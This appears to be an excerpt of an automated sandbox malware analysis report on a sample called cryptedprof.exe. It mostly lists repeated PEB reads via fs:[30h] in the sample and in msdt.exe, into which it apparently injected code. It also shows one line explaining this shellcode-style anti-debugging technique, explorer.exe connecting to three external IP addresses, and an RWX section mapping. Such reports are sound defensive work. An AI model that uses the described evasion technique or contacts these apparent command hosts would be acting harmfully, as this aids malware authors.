          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B71C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B71C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B71C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B71C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B71C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B71C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B71C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B8740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B8740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B8740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B36C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B36C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B36C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B36C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AD746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AEAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AEAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AEAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AEAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AEAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AEAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AEAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AEAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AEAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AEAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AEAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B4C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B4C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AEA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AE35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B805AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B805AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AE1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AE1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AE1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AB2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AB2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AB2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AB2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AB2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AE2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AE2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AE2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AE2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AEFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AEFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B68DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ACD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ACD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B7FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B7FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B7FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B7FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B36DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B36DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B36DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B36DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B36DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B36DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B3A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B88D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B7E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AE4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AE4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AE4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AC3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AC3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AC3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AC3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AC3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AC3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AC3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AC3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AC3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AC3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AC3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AC3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AC3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ABAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ADC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ADC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AF3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B33540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B63D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AD7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B346A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B80EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B80EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B80EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B4FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AE16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AC76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AE36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AF8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B88ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B6FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B6FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ABE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ABC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ABC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ABC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AE8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AEA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AEA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B71608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AC766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ADAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ADAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ADAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ADAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ADAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AC7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AC7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AC7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AC7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AC7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AC7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B7AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B7AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B37794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B37794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B37794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04761074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04752073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046B746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0472C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0472C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046CA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046B0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046B0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046AB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046AB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046AB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046AB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046CBC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046C002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046C002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046C002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046C002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046C002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04764015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04764015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04717016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04717016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04717016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04751C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04751C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04751C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04751C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04751C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04751C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04751C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04751C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04751C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04751C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04751C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04751C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04751C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04751C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0476740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0476740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0476740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04716C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04716C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04716C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04716C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04716CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04716CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04716CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046958EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_047514FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04768CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0472B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0472B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0472B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0472B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0472B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0472B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046D90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046C20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046C20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046C20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046C20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046C20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046C20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046CF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046CF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046CF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04699080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046A849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04713884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04713884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0469C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0469B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0469B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046BC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046BC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046D3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046BB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046BB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04713540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046B7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04768D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0471A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046B4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046B4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046B4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046B4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046B4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0475E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046C513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046C513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046C4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046C4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046C4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0469AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046A3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_046A3D34 mov eax, dword ptr fs:[00000030h] (5 occurrences)
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_04699100 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_04748DF1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_0469B1E1 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_046AD5E0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_0475FDE2 mov eax, dword ptr fs:[00000030h] (4 occurrences)
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_047241E8 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_04716DC9 mov eax, dword ptr fs:[00000030h] (5 occurrences); mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_046C61A0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_046C35A1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_047151BE mov eax, dword ptr fs:[00000030h] (4 occurrences)
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_047169A6 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_046C1DB5 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_047605AC mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_04692D8A mov eax, dword ptr fs:[00000030h] (5 occurrences)
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_046CA185 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_046BC182 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_046C2581 mov eax, dword ptr fs:[00000030h] (3 occurrences)
(In 32-bit code fs:[30h] is the TEB field holding the PEB pointer; reading it directly is how shellcode-style code reaches PEB fields such as BeingDebugged and the loader's module list without calling any API, which is why these reads cluster in the code injected into msdt.exe.)
Source: C:\Users\user\Desktop\cryptedprof.exe Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80
Source: C:\Windows\explorer.exe Network Connect: 111.221.46.49 80
Source: C:\Windows\explorer.exe Network Connect: 168.206.81.138 80
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\cryptedprof.exe Section loaded: unknown target: C:\Users\user\Desktop\cryptedprof.exe protection: execute and read and write
